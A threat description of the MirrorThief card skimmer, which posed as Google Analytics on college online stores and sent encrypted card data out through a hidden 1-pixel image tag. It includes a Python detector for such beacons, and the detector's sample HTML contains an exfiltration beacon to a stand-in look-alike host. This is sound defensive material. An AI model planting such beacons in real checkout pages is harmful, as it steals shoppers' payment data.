MirrorThief Card Skimmer Description
Card-skimming operations are nothing new in the world of cybercrime. Shady individuals have been carrying out such attacks for years, collecting credit card information and then selling it on the Deep Web or various hacking sites. Recently, it was reported that a total of 201 US and Canadian college online stores had fallen victim to a card-skimming attack.
The MirrorThief Card Skimmer manages to stay under the radar by mimicking the Google Analytics service. The attackers had even gone as far as to create a domain for their threat that is meant to resemble the legitimate Google Analytics website closely.
The skimmed payment details are stored in a JSON file. To secure the file, the attackers use AES encryption and base64 encoding before beginning the transfer. The skimmer's code will then create an HTML image tag on the compromised server that contains a URL to the attacker's server, as well as additional parameters that are used to append the encrypted JSON file. The image tag itself works with a 1-pixel image, so it is impossible to notice without taking a very close look at the page's source code.
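A detection sketch for the beacon pattern described above, added here as an example and not taken from the skimmer or from any vendor tooling: it scans a rendered DOM snapshot for 1-pixel image tags that send a long base64 value to a host outside an allowlist. The hostnames, the allowlist and the sample markup are constructed, and the 16-byte alignment flag is only a heuristic because the page does not state which AES mode is used.

```python
import base64
import binascii
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl, quote

def decode_blob(value, min_bytes=32):
    """Return decoded bytes if value is a long, valid base64 string, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw if len(raw) >= min_bytes else None

class PixelBeaconFinder(HTMLParser):
    """Collects 1-pixel <img> tags that send base64 blobs to unlisted hosts."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag != "img" or a.get("width") != "1" or a.get("height") != "1":
            return
        url = urlsplit(a.get("src") or "")
        host = (url.hostname or "").lower()
        if not host or host in self.allowed:
            return  # relative URL or a host the store expects to call
        for name, value in parse_qsl(url.query):
            raw = decode_blob(value)
            if raw is not None:
                # Block-mode AES output is a multiple of 16 bytes (heuristic only).
                self.findings.append((host, name, len(raw), len(raw) % 16 == 0))

def find_beacons(html, allowed_hosts):
    finder = PixelBeaconFinder(allowed_hosts)
    finder.feed(html)
    return finder.findings

# Constructed sample: 48 placeholder bytes stand in for the encrypted JSON.
BLOB = quote(base64.b64encode(bytes(range(48))).decode(), safe="")
SAMPLE = (
    '<img width="1" height="1" src="https://www.google-analytics.com/collect?v=1&t=pageview">'
    f'<img width="1" height="1" src="https://analytics-lookalike.example/p.gif?d={BLOB}">'
    '<img width="600" height="400" src="https://cdn.example/banner.png?id=42">'
)
ALLOWED = {"www.google-analytics.com", "store.example"}  # hypothetical allowlist

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE, ALLOWED):
        print(finding)
```

Because the look-alike domain is not on the allowlist, it is reported even though the tag has the same shape as a genuine analytics pixel; the same allowlist translates directly into a Content-Security-Policy `img-src` directive on checkout pages.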
These attacks are not uncommon, and online stores need to follow the latest cybersecurity trends to ensure the safety of their customers, as this is entirely their responsibility.